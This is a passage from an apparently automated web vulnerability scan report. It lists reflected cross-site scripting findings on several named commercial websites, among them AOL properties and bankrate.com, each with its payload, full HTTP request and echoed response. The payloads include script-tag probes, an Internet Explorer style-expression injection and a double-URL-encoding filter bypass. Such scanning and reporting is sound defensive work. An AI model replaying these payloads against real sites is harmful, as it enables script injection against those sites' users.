572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='3510636931304557033';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='486cc<script>alert(1)</script>6c5dd41fd57';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.164. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload b5d7b<script>alert(1)</script>cb4c8ceae8d was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72b5d7b<script>alert(1)</script>cb4c8ceae8d&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-13_8327244281304557033; expires=Tue, 03-May-2016 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_8327244281304557033; expires=Thu, 05-May-2011 01:12:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8327244281304557033';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72b5d7b<script>alert(1)</script>cb4c8ceae8d';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.165. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 19842<script>alert(1)</script>d909d40b397 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=&uid=19842<script>alert(1)</script>d909d40b397&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-14_15133110431304557034; expires=Tue, 03-May-2016 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_15133110431304557034; expires=Thu, 05-May-2011 01:12:14 GMT; path=/; domain=c3metrics.com
Content-Length: 6677
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='15133110431304557034';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='19842<script>alert(1)</script>d909d40b397';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.166. http://view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload edd5c<script>alert(1)</script>923b8682cad was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=aol&cid=480edd5c<script>alert(1)</script>923b8682cad&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1037
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s2; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=aol&cid=480edd5c<script>alert(1)</script>923b8682cad&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a
...[SNIP]...

5.167. http://view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 4d420<script>alert(1)</script>f20f5fc8715 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=aol4d420<script>alert(1)</script>f20f5fc8715&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1037
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s3; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=aol4d420<script>alert(1)</script>f20f5fc8715&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new
...[SNIP]...

5.168. http://view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 58e31<script>alert(1)</script>3e94f7bd64d was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=aol&cid=480&t=7258e31<script>alert(1)</script>3e94f7bd64d HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1037
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s10; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=aol&cid=480&t=7258e31<script>alert(1)</script>3e94f7bd64d&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a);var
...[SNIP]...

5.169. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /category/goodnews/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c033e"%3bf7c25182fc9 was submitted in the REST URL parameter 2. This input was echoed as c033e";f7c25182fc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/goodnewsc033e"%3bf7c25182fc9/ HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:56:20 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
channel="us.news";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="";
s_265.prop2="main";
s_265.prop12="http://www.aolnews.com/category/goodnewsc033e";f7c25182fc9/";
s_265.prop18="goodnewsc033e\";f7c25182fc9";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.170. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7abf6"style="x:expression(alert(1))"ef43b8923ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /funnel/mortgages/?7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/funnel/mortgages/?7abf6"style="x:expression(alert(1))"ef43b8923ec=1" />
...[SNIP]...

5.171. http://www.citysbest.com/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89199"><script>alert(1)</script>cd5f8e88860 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:46 GMT; path=/
Content-Type: text/html
Content-Length: 15674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860"/>
...[SNIP]...

5.172. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f2e5"><script>alert(1)</script>6009f09c189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:05 GMT; path=/
Content-Type: text/html
Content-Length: 15691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1"/>
...[SNIP]...

5.173. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0958"><script>alert(1)</script>e2e8451909c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:36 GMT; path=/
Content-Type: text/html
Content-Length: 17532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643"/>
...[SNIP]...

5.174. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6 was submitted in the REST URL parameter 1. This input was echoed as f3384</script><script>alert(1)</script>0ccc1ec0bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /trafficf3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:57 GMT; path=/
Content-Type: text/html
Content-Length: 17861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "trafficf3384</script><script>alert(1)</script>0ccc1ec0bf6" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

5.175. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dailyfinance.com
Path:   /markets/mostactives

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7010'%3b71e04f33930 was submitted in the REST URL parameter 2. This input was echoed as b7010';71e04f33930 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/mostactivesb7010'%3b71e04f33930 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Apache
Pragma: no-cache
